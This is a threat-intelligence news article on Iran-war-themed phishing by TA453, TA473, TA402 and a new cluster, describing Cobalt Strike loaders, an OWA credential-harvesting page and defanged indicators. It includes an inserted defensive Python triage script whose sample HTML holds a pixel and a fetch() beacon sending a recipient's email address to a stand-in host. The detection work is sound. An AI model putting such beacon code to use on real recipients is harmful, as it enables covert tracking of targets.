
The activity includes operations by known threat groups such as TA453 and TA473, as well as several newly tracked clusters.
Researchers say the campaigns show two clear trends. First, some actors are simply using the war as a timely topic to improve click rates.
War Lures Drive Multiple Phishing Operations
One of the most active new clusters used dramatic themes linked to the conflict, including false claims about Ayatollah Khamenei’s death and warnings that Israel might attack Gulf oil and gas infrastructure. The emails linked to password-protected archives hosted on Google Drive.
Inside were LNK shortcut files disguised as JPG images. When opened, they launched a hidden loader that abused DLL sideloading to run a Cobalt Strike payload in memory.
Another campaign, attributed to TA402, used a compromised Iraqi government email account and an attacker-controlled Gmail address to target a Middle Eastern government entity. The messages referenced possible US military operations in Iran.
They included links that either displayed a fake document or a credential-harvesting page styled to look like Microsoft Outlook Web App, depending on the victim’s location.
TA453 and TA473 Expand The Threat Picture
Researchers also tracked TA473, also known as Winter Vivern, targeting government organizations in Europe and the Middle East. The group sent emails pretending to come from a spokesperson for the European Council President.
The attachment was an HTML file that displayed a decoy image and quietly sent HTTP requests containing the target’s email address, likely for tracking and engagement monitoring.
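As an added example (not code from the report or from any of the actors or vendors it names), the following Python triage check targets the TA473-style HTML attachment described above: it collects the resource URLs an HTML file would load or request and flags any that carry the recipient's own address, in plaintext or base64, which is the usual sign of engagement tracking. The HTML, domains and recipient address are constructed for the example.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# URLs in markup attributes, and URLs passed to common JS request calls.
URL_ATTR_RE = re.compile(r"""(?:src|href|action)\s*=\s*["']([^"']+)["']""", re.I)
JS_URL_RE = re.compile(
    r"""(?:fetch|open|sendBeacon)\(\s*(?:["'][A-Z]+["']\s*,\s*)?["'](https?://[^"']+)["']""",
    re.I,
)


def _decode_b64(s: str) -> str:
    """Best-effort base64/urlsafe-base64 decode; returns '' if s is not base64."""
    try:
        pad = "=" * (-len(s) % 4)
        return base64.urlsafe_b64decode(s + pad).decode("utf-8", "ignore")
    except Exception:
        return ""


def find_tracking_beacons(html: str, recipient: str) -> list:
    """Return (url, evidence) for every remote URL that embeds the recipient's address."""
    rec = recipient.lower()
    hits = []
    for url in URL_ATTR_RE.findall(html) + JS_URL_RE.findall(html):
        if not url.lower().startswith(("http://", "https://")):
            continue  # cid:, data: and relative references cannot beacon out
        parts = urlsplit(url)
        # Check the decoded query, each query value, and the last path segment.
        candidates = [unquote(parts.query), parts.path.rsplit("/", 1)[-1]]
        for values in parse_qs(parts.query).values():
            candidates.extend(values)
        for cand in candidates:
            if rec in cand.lower():
                hits.append((url, "plaintext-email"))
                break
            if rec in _decode_b64(cand).lower():
                hits.append((url, "base64-email"))
                break
    return hits


# Constructed sample: a decoy inline image, a 1x1 pixel with the address in the
# query string, and a script that fetches a URL whose path is the base64 address.
_B64_ADDR = base64.urlsafe_b64encode(b"target.user@example.gov").decode()
SAMPLE_HTML = f"""<html><body>
<img src="cid:decoy.png" alt="decoy">
<img src="https://cdn.example/pixel.gif?u=target.user%40example.gov&id=7" width="1" height="1">
<script>fetch("https://collect.example/t/{_B64_ADDR}");</script>
</body></html>"""

if __name__ == "__main__":
    for url, evidence in find_tracking_beacons(SAMPLE_HTML, "target.user@example.gov"):
        print(evidence, url)
```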
Meanwhile, TA453, an Iran-aligned espionage actor also known as APT42 or Charming Kitten, continued its usual intelligence-gathering activities during the war.
In one observed case, the group built rapport with a US think tank target through a believable email thread about a Proofpoint roundtable on Middle East air defense.
| Threat Actor | Campaign Theme | Associated IOC / Sender | Payload / Malicious Domain |
|---|---|---|---|
| UNK_InnerAmbush | Khamenei’s death / Gulf oil attack | uzbembish@elcat[.]kg | Photos from the scene.rar / Cobalt Strike |
| TA402 | US ground operation / Gulf alliance | ban.ali@mofa.gov[.]iq | mail[.]iwsmailserver[.]com (OWA Phish) |
The Iran conflict is not only driving military and diplomatic tension, but also creating powerful social engineering themes for cyber threat actors.
For defenders, the risk is growing because these messages mix real events, compromised government accounts, cloud services, and tailored credential theft pages to make phishing more convincing and harder to spot.
The post TA453 and TA473 Drive Iran War-Themed Phishing Across The Middle East appeared first on Cyber Security News.
